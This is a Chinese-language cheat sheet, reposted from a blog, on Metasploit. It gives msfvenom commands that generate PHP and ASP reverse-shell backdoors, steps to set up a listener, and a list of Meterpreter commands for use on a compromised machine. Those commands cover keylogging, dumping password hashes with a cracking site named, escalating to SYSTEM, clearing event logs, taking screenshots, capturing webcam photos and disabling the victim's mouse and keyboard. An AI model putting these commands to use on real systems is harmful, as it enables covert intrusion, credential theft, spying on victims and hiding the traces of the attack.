一 建立反彈后門
msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php
注:生成的反彈木馬存放在當前用戶home目錄下;
將生成的木馬上傳到目標機中,可以遠程訪問;
windows下asp反彈木馬:
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.131 -f asp > shell.asp
二 監聽端口建立會話
1 使用handler模塊
msf > use exploit/multi/handler
2 設置payload
msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp(當時windows時php換成windows)
PAYLOAD =>php/meterpreter/reverse_tcp
3 設置監聽主機
msfexploit(multi/handler) > set LHOST 192.168.88.155
LHOST =>192.168.88.155
4 設置監聽端口(默認4444)
msfexploit(multi/handler) > set LPORT 4444
LPORT => 4444
5 發動攻擊
msfexploit(multi/handler) > exploit
注:要遠程訪問你上傳的后門文件
meterpreter > keyscan_start
keyscan_dump // 查看鍵盤記錄
監控目標系統鍵盤輸入,停止監控為keyscan_stop
meterpreter > migrate
將你的Meterpreter移到另一個進程
先用PS命令查看進程后,得到進程ID,然后在執行Migrate (進程ID)
meterpreter > getuid
獲取用戶的服務器運行
meterpreter > shell
進入目標電腦,命令提示符
meterpreter > Idletime
目標電腦閑置了多長時間
meterpreter > Hashdump
導出對方SAM數據庫里的內容,推薦一個hash破解網站:
http://www.objectif-securite.ch/products.php
meterpreter > getsystem
利用已自漏洞,自動提權為SYSTEM
meterpreter > clearev
清除事件日志
meterpreter > execute(某Windows指令)
在對方電腦上運行該指令
meterpreter > execute
Usage: execute -f file [options]
meterpreter > download(文件路徑)
下載文件命令
例如下載C盤下面的jzking121.txt文件
meterpreter > download c:\\jzking121.txt
[*] downloading: c:\jzking121.txt -> jzking121.txt
[*] downloaded : c:\jzking121.txt -> jzking121.txt
注意,文件路徑中要有兩個\\
Upload指令跟Download指令類似!
meterpreter > shutdown
關閉目標計算機,reboot為重啟計算機
meterpreter >screenshot
獲取目標電腦,屏幕截圖
meterpreter > uictl enable keyboard 啟用目標使用鍵盤
meterpreter > uictl disable mouse 禁止目標使用鼠標
enable 為啟用
disable 禁用
meterpreter > webcam_list
目標系統的攝像頭列表
meterpreter > webcam_snap
從指定的攝像頭,拍攝照片
meterpreter > search -d c:\\ -f 1.jpg
搜索目標電腦,C盤1.jpg文件
————————————————
轉載自msdn,原文鏈接:https://blog.csdn.net/u012991692/article/details/80784258